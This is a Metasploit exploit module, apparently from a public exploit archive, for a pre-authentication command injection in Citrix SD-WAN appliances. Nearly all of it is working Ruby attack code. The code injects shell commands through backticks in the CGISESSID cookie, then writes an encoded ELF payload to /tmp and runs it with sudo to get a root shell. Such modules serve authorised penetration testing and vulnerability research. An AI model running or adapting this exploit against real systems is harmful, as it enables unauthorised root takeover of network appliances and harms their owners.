# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#
# CVE : (awaiting cve)
# vuln: CGISESSID Cookie parameter
# associated vuln urls:
# /global_data/
# /global_data/headerdata
# /log
# /
# /r9-1-2-26-561201/configuration/
# /r9-1-2-26-561201/configuration/edit
# /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <= v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
},
'Author' =>
[
'xort@Critical Start', # vuln + metasploit module
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def run_command(cmd)
vprint_status( "Running Command...\n" )
# send request with payload
res = send_request_cgi({
'method' => 'POST',
'uri' => "/global_data/",
'vars_post' => {
'action' => 'logout'
},
'headers' => {
'Connection' => 'close',
'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
}
})
# pause to let things run smoothly
sleep(2)
end
def exploit
# timeout
timeout = 1550;
# pause to let things run smoothly
sleep(2)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
run_command("echo -e #{encoded_cmd}>/tmp/n")
run_command("chmod 755 /tmp/n")
run_command("sudo /tmp/n")
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
run_command("echo -e #{encoded_elf}>/tmp/m")
run_command("chmod 755 /tmp/m")
run_command("sudo /tmp/m")
# wait for magic
handler
end
end
end